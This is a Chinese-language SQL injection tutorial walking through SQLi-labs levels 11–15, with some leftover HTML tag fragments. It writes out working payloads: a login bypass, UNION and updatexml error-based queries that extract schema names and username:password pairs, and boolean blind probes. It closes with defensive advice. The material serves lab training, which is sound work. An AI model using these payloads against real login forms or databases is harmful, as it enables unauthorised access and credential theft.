SQL注入实战教学：SQLi-labs关卡11-15详解<\/h1>

环境准备<\/h2>
操作系统：Windows 7<\/li>
部署工具：phpstudy2018<\/li>
靶场环境：SQLi-labs<\/li> <\/ul>
第11关：基于POST表单的单引号闭合注入<\/h2>

源码分析<\/h3>
$sql=<\/span>"SELECT username, password FROM users WHERE username='<\/span>$uname<\/span>' and password='<\/span>$passwd<\/span>' LIMIT 0,1"<\/span>;
<\/span><\/span><\/code><\/pre>注入步骤<\/h3>


初步测试<\/strong><\/p>

输入1和1：页面提示登录失败，SQL执行正常<\/li>
输入单引号：出现语法错误<\/li>
输入双引号：无错误<\/li>
结论：单引号闭合<\/li>
<\/ul>
<\/li>

构造万能密码<\/strong><\/p>
username: 1' or 1=1 #
password: [任意或留空]
<\/code><\/pre>

1'<\/code>闭合第一个单引号<\/li>
or 1=1<\/code>构造恒真条件<\/li>
#<\/code>注释掉后续语句<\/li>
<\/ul>
<\/li>

联合查询注入<\/strong><\/p>

获取数据库名：<\/li>
<\/ul>
1' union select 1,database() #
<\/code><\/pre>

获取表名：<\/li>
<\/ul>
1' union select 1,(select table_name from information_schema.tables where table_schema='security' limit 1,1) #
<\/code><\/pre>
或获取所有表名：<\/p>
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security') #
<\/code><\/pre>

获取字段名：<\/li>
<\/ul>
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') #
<\/code><\/pre>

提取数据：<\/li>
<\/ul>
1' union select 1,(select concat(username,':',password) from users limit 1,1) #
<\/code><\/pre>
<\/li>
<\/ol>
技术要点<\/h3>

POST请求参数名需通过查看页面源码确认<\/li>
浏览器会对特殊字符编码，可使用Hackbar或BurpSuite<\/li>
多个参数用&<\/code>连接<\/li>
<\/ul>
第12关：双引号加括号闭合注入<\/h2>
注入步骤<\/h3>

测试单引号：无报错<\/li>
测试双引号：出现报错，显示小括号<\/li>
结论：")<\/code>闭合<\/li>
<\/ol>
注入方法<\/h3>
与第11关相同，只需将单引号替换为双引号加括号：<\/p>
1") or 1=1 #
<\/code><\/pre>
第13关：单引号加括号闭合的报错注入<\/h2>
注入步骤<\/h3>


测试闭合方式：<\/p>

输入1'<\/code>：报错显示小括号<\/li>
结论：')<\/code>闭合<\/li>
<\/ul>
<\/li>

报错注入：<\/p>

获取数据库名：<\/li>
<\/ul>
1') and updatexml(1, concat(0x7e, database(), 0x7e), 1)#
<\/code><\/pre>

获取表名：<\/li>
<\/ul>
1') and updatexml(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='security'), 0x7e), 1)#
<\/code><\/pre>

获取字段名：<\/li>
<\/ul>
1') and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'), 0x7e), 1)#
<\/code><\/pre>
<\/li>
<\/ol>
第14关：双引号闭合的报错注入<\/h2>
注入步骤<\/h3>

测试闭合方式：双引号引起报错<\/li>
结论："<\/code>闭合<\/li>
注入方法与第13关类似，使用双引号替代单引号加括号<\/li>
<\/ol>
第15关：布尔盲注<\/h2>
特点<\/h3>

只有"登录成功\/失败"的简单反馈<\/li>
无法直接获取数据<\/li>
<\/ul>
注入方法<\/h3>


测试闭合方式：<\/p>
username: 1' or 1 -- a
password: 1
<\/code><\/pre>
成功登录则确认单引号闭合<\/p>
<\/li>

布尔盲注示例：<\/p>

测试数据库长度：<\/li>
<\/ul>
1' or length(database())=8 -- a
<\/code><\/pre>

其他布尔盲注技术可依次类推<\/li>
<\/ul>
<\/li>
<\/ol>
关键知识点总结<\/h2>


闭合方式判断<\/strong>：<\/p>

单引号'<\/code><\/li>
双引号"<\/code><\/li>
单引号加括号')<\/code><\/li>
双引号加括号")<\/code><\/li>
<\/ul>
<\/li>

注入技术<\/strong>：<\/p>

联合查询注入<\/li>
报错注入（updatexml）<\/li>
布尔盲注<\/li>
<\/ul>
<\/li>

MySQL特殊语法<\/strong>：<\/p>

注释符号：#<\/code>、-- <\/code>（注意空格）<\/li>
信息查询：information_schema<\/code>数据库<\/li>
字符串连接：concat()<\/code><\/li>
分组连接：group_concat()<\/code><\/li>
<\/ul>
<\/li>

POST注入注意事项<\/strong>：<\/p>

参数名需查看源码确认<\/li>
特殊字符会被浏览器编码<\/li>
可使用工具直接发送原始POST数据<\/li>
<\/ul>
<\/li>

防御建议<\/strong>：<\/p>

使用参数化查询<\/li>
对输入进行严格过滤<\/li>
最小权限原则<\/li>
错误信息不直接返回给用户<\/li>
<\/ul>
<\/li>
<\/ol>
通过这五个关卡的练习，可以掌握基本的SQL注入技术，包括不同闭合方式的判断、多种注入方法的应用，以及如何应对不同的页面反馈情况。<\/p>